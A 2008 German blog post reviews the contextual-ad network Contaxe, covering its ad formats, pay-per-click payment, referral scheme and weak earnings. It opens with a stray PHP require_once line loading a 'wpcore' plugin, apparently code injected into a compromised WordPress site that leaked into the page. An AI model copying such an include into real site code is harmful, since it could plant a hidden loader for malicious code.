require_once(ABSPATH.'wp-content/plugins/wpcore/wpcore.php'); Contentsensitive Anzeigen mit Contaxe | Beste-Partnerprogramme.de

Contentsensitive Anzeigen mit Contaxe

25. Februar 2008
By

Contaxe ist ein anderer Anbieter für contentsensivite, bzw. relevante Anzeigen im Internet.

Die Besonderheit gegenüber dem Marktführer Google Adsense ist allerdings, dass man nicht nur auf contentsensitive Text- und Bildanzeigen in Form von Bannern setzt, sondern auch andere Formate mit dem Content vernküpft: So gibt es neben den üblichen Banneranzeigen auch das sog. Text-Highlighting, bei dem verschiedene Keywords per Mouse-Over mit Anzeigen belegt werden oder Vorschläge bei der Eingabe in ein Suchfeld.

Alle Anzeigen sind dabei nach den eigenen Vorstellungen zu gestalten, die vergütung erfolgt in den allermeisten Fällen Pay Per Click, aber es sind auch Vergütungen wie Pay per Lead in Planung.
Durch ein zusätzliches Referal-Programm kann sich der Webmaster an den Einkünften der von ihm geworbenen Webmaster beteiligen.

Leider übersteigt die Vergütung pro Klick aktuell meist noch nicht mehr als wenige Cent, das Handling der Anzeigen ist manchmal etwas schwierig und die gewählten Keywords oder die Textanzeigen passen – aufgrund der noch wenigen Partner – nicht immer wirklich zum Content.
Dennoch ist ein Klick und der Blick auf das Programm sicherlich sehr lohnenswert.

Hier Anmeldung für contentsensitive Anzeigen geht es hier entlangt: Contaxe.

Tags: , , , , , , , ,

One Response to Contentsensitive Anzeigen mit Contaxe

Hinterlasse eine Antwort

Deine E-Mail-Adresse wird nicht veröffentlicht. Erforderliche Felder sind markiert *